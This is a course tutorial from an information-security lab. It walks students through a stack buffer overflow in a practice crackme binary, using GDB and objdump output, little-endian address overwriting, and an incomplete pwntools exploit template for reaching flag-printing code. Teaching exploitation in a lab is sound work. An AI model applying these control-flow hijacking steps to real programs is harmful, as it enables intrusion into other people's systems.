Tut03: Writing Your First Exploit

In this tutorial, you'll learn, for the first time, how to write a control-flow hijacking attack that exploits a buffer overflow vulnerability!

Step 1: Understanding a crashing state

There are a few ways to check the reason for a segmentation fault:

Note: "/tmp/[secret]/input" below is a placeholder name for your secret input file in /tmp.

Running GDB:

$ cd ~/tut03-stackovfl/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > /tmp/[secret]/input
$ gdb ./crackme0x00
> run </tmp/[secret]/input
Starting program: ./crackme0x00 </tmp/[secret]/input
IOLI Crackme Level 0x00
Password: Invalid Password!

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Checking logging messages (if you're working on your local machine):
```
$ dmesg | tail -1
[19513751.485863] crackme0x00[20200]: segfault at 41414141 ip 000000000804873c sp 00000000ffffd668 error 4 in crackme0x00[8048000+1000]
```
Note: dmesg is disabled on our lab server, but you can use it in your own local environment.

Checking logging messages (if you're working on our server):

When you're working under /tmp/ (and only then), our server stores dmesg-like logging information for you whenever a lab challenge crashes. For example, you can find a logging output file named "core_info" under your /tmp/[secret]/ directory if you crash our tutorial binary, crackme0x00:

$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
...
$ ls
core_info  input
$ cat core_info
[New LWP 18]
Core was generated by `/home/lab03/tut03-stackovfl/crackme0x00'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x41414141 in ?? ()
eax            0x0      0
ecx            0x804b160        134525280
edx            0xf7fbe890       -134485872
ebx            0x0      0
esp            0xffffd5e8       0xffffd5e8
ebp            0x41414141       0x41414141
esi            0xf7fbd000       -134492160
edi            0x0      0
eip            0x41414141       0x41414141
eflags         0x10292  [ AF SF IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

The instruction pointer was overwritten with 0x41414141 ("AAAA", part of our input string). Let's figure out exactly which part of our input tainted the instruction pointer.

$ cd /tmp/[secret]/
$ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
$ dmesg | tail -1
[19514227.904759] crackme0x00[21172]: segfault at 46464646 ip 0000000046464646 sp 00000000ffffd688 error 14 in libc-2.27.so[f7de5000+1d5000]

What's the instruction pointer's value now, as a string? (man ascii might help.) Can you now tell what part of the string is overwriting it?

Understanding the stack frame

You can infer the shape of a function's stack frame from the function's disassembly (for example, with Ghidra or objdump):

$ objdump -M intel-mnemonic -d crackme0x00
...
080486b3 <start>:
80486b3:       55                      push   ebp
80486b4:       89 e5                   mov    ebp,esp
80486b6:       83 ec 10                sub    esp,0x10
...

Let's analyze how the stack frame is constructed:

When start is called (by whatever other function calls it), the return address is automatically pushed onto the stack by the call instruction. So every stack frame always has the return address ("ra") at the top:
```
     esp
      V
<...> [ra]
```
ebp is a register that's used to point to the top of the current function's stack frame. When the function begins, "push ebp" pushes that register's previous value (from the calling function) to the stack, so that it can be properly restored later when the function returns. Then mov ebp,esp updates ebp to be correct for the current function.
```
   ebp/esp
      V
<...> [bp] [ra]
```

sub esp,0x10 reserves 0x10 bytes for local variables.

esp          ebp
 V            V
 [??????????] [bp] [ra]
 |<- 0x10 ->|

Looking down a bit farther, at the call to scanf:

...
80486d3:       8d 45 f0                lea    eax,[ebp-0x10]
80486d6:       50                      push   eax
80486d7:       68 11 88 04 08          push   0x8048811
80486dc:       e8 9f fd ff ff          call   8048480 <scanf@plt>
...

The first argument is 0x8048811 (you can check what's at that address -- it's "%s"), and the second is ebp-0x10. scanf will write its string output to its second argument, so we can consider that area on the stack to be the buffer.

There could be other local variables within that 0x10 bytes, but in this case there aren't any. The only way to find out exactly how the local variables are arranged is to study the entire function (perhaps with the help of a decompiler) and see how it uses its stack frame.

So for our long, overflowing input string, the first 0x10 bytes will fit in the 0x10-byte buffer, the next 4 will overwrite the stored ebp, and the next 4 will overwrite the return address, which is what the instruction pointer will be set to when the function returns. That's why it ended up as FFFF -- those are the 0x14'th through 0x18'th bytes of our input.

What do you expect ebp to end up as? Check core_info and see if you're right!

Step 2: Hijacking the control flow

In this tutorial, we're going to hijack the control flow of crackme0x00 by overwriting the instruction pointer. As a first step, let's make it print out Password OK :) without giving it the correct password!

   80486ed:       e8 2e fd ff ff          call   8048420 <strcmp@plt>
   80486f2:       83 c4 08                add    esp,0x8
   80486f5:       85 c0                   test   eax,eax
   80486f7:       75 31                   jne    804872a <start+0x77>
 ->80486f9:       68 3e 88 04 08          push   0x804883e
   80486fe:       e8 6d fd ff ff          call   8048470 <puts@plt>

   ...
   804872c:       68 92 88 04 08          push   0x8048892
   8048731:       e8 3a fd ff ff          call   8048470 <puts@plt>
   8048736:       83 c4 10                add    esp,0x10

We're going to jump to 0x80486f9 so that it'll print out Password OK :).

Which characters in the input should be changed to 0x80486f9? Keep in mind that x86 is a little-endian architecture.

$ hexedit /tmp/[secret]/input

"Ctrl+X" will exit and let you save your changes.

$ cat input | ~/tut03-stackovfl/./crackme0x00
IOLI Crackme Level 0x00
Password: Invalid Password!
Password OK :)
Segmentation fault

Step 3: Using Python template for exploitation

Today's main task is to modify a Python template for exploitation. Please edit the provided Python script (exploit.py) to hijack the control flow of crackme0x00! Most importantly, to get the flag, you need to hijack the control flow to reach unreachable code in the binary.

// To get the flag, your input seemingly needs to be both "250381"
// and "no way you can reach!" at the same time!

  8048706:       68 4d 88 04 08          push   0x804884d
  804870b:       8d 45 f0                lea    eax,[ebp-0x10]
  804870e:       50                      push   eax
  804870f:       e8 0c fd ff ff          call   8048420 <strcmp@plt>
  8048714:       83 c4 08                add    esp,0x8
  8048717:       85 c0                   test   eax,eax
  8048719:       75 1c                   jne    8048737 <start+0x84>
->804871b:       68 63 88 04 08          push   0x8048863
  8048720:       e8 d1 fe ff ff          call   80485f6 <print_key>

In this template, we will start utilizing pwntools, which provides a set of libraries and tools to help writing exploits. Although we'll cover the details of pwntools in the next tutorial, you can have a glimpse here of how it looks.

#!/usr/bin/env python3

# import variables/functions from pwntools into our global namespace,
# for easy access
from pwn import *

if __name__ == '__main__':

    # p32/64 for "packing" 32- or 64-bit integers
    # so, given an integer, it returns a packed (i.e., encoded) bytestring
    assert p32(0x12345678) == b'\x00\x00\x00\x00'                  # Q1
    assert p64(0x12345678) == b'\x00\x00\x00\x00\x00\x00\x00\x00'  # Q2

    payload = b'Q3. your input here'

    # launch a process (with no arguments)
    p = process(['./crackme0x00'])

    # send an input payload to the process
    p.send(payload + b'\n')  # or, shorter: "p.sendline(payload)"

    # make it interactive, meaning that we can interact with the
    # process's input/output (via a pseudo-terminal)
    p.interactive()

Modify Q1-3 in the template to make this exploit work.

[Task] Modify the template (exploit.py) to hijack the control flow and print out the flag.

If you'd like to practice more, can you make the exploit gracefully exit the program after hijacking its control multiple times?

Debugging tips and exec-wrapper

Let's discuss how we can utilize the set exec-wrapper feature in GDB to better match the process's behavior outside the debugger. When exec-wrapper is set, the specified wrapper is used to launch programs for debugging. GDB starts your program with a shell command of the form exec-wrapper program. Any program that eventually calls execve on its arguments can be used as a wrapper.

For example, you can use env (learn about it: man env) to pass an environment variable to the debugged program, without setting the variable in your shell’s environment:

(gdb) set exec-wrapper env 'LD_PRELOAD=libtest.so'
(gdb) run

For further reading about exec-wrapper, please refer to here.

Tip 1: clear env variables

In order to get a predictable stack in a system with ASLR disabled, set exec-wrapper env -i can be used to ensure that the program is launched in an empty environment while debugging. For example, you can use it when getting a core dump:

$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ gdb-pwndbg ~/tut03-stackovfl/crackme0x00
pwndbg> set exec-wrapper env -i
pwndbg> r
Starting program: /home/lab03/tut03-stackovfl/crackme0x00
IOLI Crackme Level 0x00
Password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Invalid Password!

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

pwndbg> gcore
Saved corefile core.545

Note that "set exec-wrapper env -i" is a default GDB setting on the lab server. If you don't want to use it, please disable it before debugging, e.g.,

$ export SHELLCODE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$ gdb-pwndbg ~/jmp-to-env/target


pwndbg> unset exec-wrapper
pwndbg> r BBBB

Tip 2: make stack addresses consistent

On Linux, environment variables are stored at the top of the stack when a program is launched. Thus, the main reasons why stack addresses in GDB can be different from running the program by itself are that

the env variables inside and outside of GDB are different due to the fact that it creates two new ones called LINES and COLUMNS,
the special shell variable "_" contains an executable name or argument of the previous command, and
GDB always uses absolute paths, which may be different from the path in your command.

Hence, to make stack addresses consistent, we need to:

Use absolute paths when executing inside and outside of GDB, e.g.,
```
$ env -u _ /home/lab03/jmp-to-env/target [input]
```

Remove extra env variables, e.g.

pwndbg> set exec-wrapper env -u LINES -u COLUMNS -u _

By setting the exec-wrapper above, we can remove the three extra env variables while debugging so that the environment inside GDB matches the environment outside of it.

Or, alternatively, use env -i as your exec-wrapper to remove all environment variables, and run the binary outside of GDB with env -i as well.

CS6265: Information Security Lab